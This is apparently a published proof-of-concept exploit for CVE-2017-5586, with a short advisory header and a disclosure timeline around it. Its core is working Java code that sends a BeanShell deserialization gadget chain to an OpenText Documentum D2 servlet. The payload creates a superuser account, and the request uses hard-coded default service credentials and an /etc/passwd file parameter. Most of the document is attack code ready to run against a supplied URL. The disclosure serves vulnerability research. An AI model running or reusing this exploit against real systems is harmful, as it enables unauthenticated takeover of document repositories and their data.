1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 |
/** CVE Identifier: CVE-2017-5586 Vendor: OpenText Affected products: Documentum D2 version 4.x Researcher: Andrey B. Panfilov Severity Rating: CVSS v3 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Description: Document D2 contains vulnerable BeanShell (bsh) and Apache Commons libraries and accepts serialised data from untrusted sources, which leads to remote code execution Proof of concept: ===================================8<=========================================== */ import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; import java.io.InputStream; import java.io.ObjectOutputStream; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.net.HttpURLConnection; import java.net.URL; import java.util.ArrayList; import java.util.Comparator; import java.util.List; import java.util.PriorityQueue; import bsh.Interpreter; import bsh.XThis; import com.documentum.fc.client.content.impl.ContentStoreResult; import com.documentum.fc.client.impl.typeddata.TypedData; /** * @author Andrey B. Panfilov <andrey (at) panfilov (dot) tel [email concealed]> * * Code below creates superuser account in underlying Documentum repository * usage: java DocumentumD2BeanShellPoc http://host:port/D2 <docbase_name> <user_name_to_create> * */ @SuppressWarnings("unchecked") public class DocumentumD2BeanShellPoc { public static void main(String[] args) throws Exception { String url = args[0]; String docbase = args[1]; String userName = args[2]; String payload = "compare(Object foo, Object bar) {new Interpreter()" + ".eval(\"try{com.documentum.fc.client.IDfSession session = com.documentum.fc.impl.RuntimeContext.getInstance()" + ".getSessionRegistry().getAllSessions().iterator().next();" + "session=com.emc.d2.api.D2Session.getAdminSession(session, false);" + "com.documentum.fc.client.IDfQuery query = new com.documentum.fc.client.DfQuery(" + "\\\"CREATE dm_user object set user_name='%s',set user_login_name='%s',set user_source='inline password', " + "set user_password='%s', set user_privileges=16\\\");query.execute(session, 3);} " + "catch (Exception e) {}; return 0;\");}"; Interpreter interpreter = new Interpreter(); interpreter.eval(String.format(payload, userName, userName, userName)); XThis x = new XThis(interpreter.getNameSpace(), interpreter); Comparator comparator = (Comparator) x.getInterface(new Class[] { Comparator.class, }); PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator); Object[] queue = new Object[] { 1, 1 }; setFieldValue(priorityQueue, "queue", queue); setFieldValue(priorityQueue, "size", 2); // actually we may send priorityQueue directly, but I want to hide // deserialization stuff from stacktrace :) Class cls = Class.forName("com.documentum.fc.client.impl.typeddata.ValueHolder"); Constructor ctor = cls.getConstructor(); ctor.setAccessible(true); Object valueHolder = ctor.newInstance(); setFieldValue(valueHolder, "m_value", priorityQueue); List valueHolders = new ArrayList(); valueHolders.add(valueHolder); TypedData data = new TypedData(); setFieldValue(data, "m_valueHolders", valueHolders); ContentStoreResult result = new ContentStoreResult(); setFieldValue(result, "m_attrs", data); ByteArrayOutputStream baos = new ByteArrayOutputStream(); DataOutputStream dos = new DataOutputStream(baos); for (Character c : "SAVED".toCharArray()) { dos.write(c); } dos.write((byte) 124); dos.flush(); ObjectOutputStream oos = new ObjectOutputStream(baos); oos.writeObject(result); oos.flush(); byte[] bytes = baos.toByteArray(); baos = new ByteArrayOutputStream(); dos = new DataOutputStream(baos); dos.writeInt(bytes.length); dos.write(bytes); dos.flush(); HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection(); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestMethod("POST"); conn.setUseCaches(false); conn.setDoOutput(true); conn.getOutputStream().write(baos.toByteArray()); conn.connect(); System.out.println("Response code: " + conn.getResponseCode()); InputStream stream = conn.getInputStream(); byte[] buff = new byte[1024]; int count = 0; while ((count = stream.read(buff)) != -1) { System.out.write(buff, 0, count); } } public static String makeUrl(String url) { if (!url.endsWith("/")) { url += "/"; } return url + "servlet/DoOperation?origD2BocsServletName=Checkin&id=1&file=/etc/passwd &file_length=1000" + "&_username=dmc_wdk_preferences_owner&_password=webtop"; } public static Field getField(final Class<?> clazz, final String fieldName) throws Exception { Field field = clazz.getDeclaredField(fieldName); if (field == null && clazz.getSuperclass() != null) { field = getField(clazz.getSuperclass(), fieldName); } field.setAccessible(true); return field; } public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { final Field field = getField(obj.getClass(), fieldName); field.set(obj, value); } } /** ===================================>8=========================================== Disclosure timeline: 2016.02.28: Vulnerability discovered 2017.01.25: CVE Identifier assigned 2017.02.01: Vendor contacted, no response 2017.02.15: Public disclosure */ |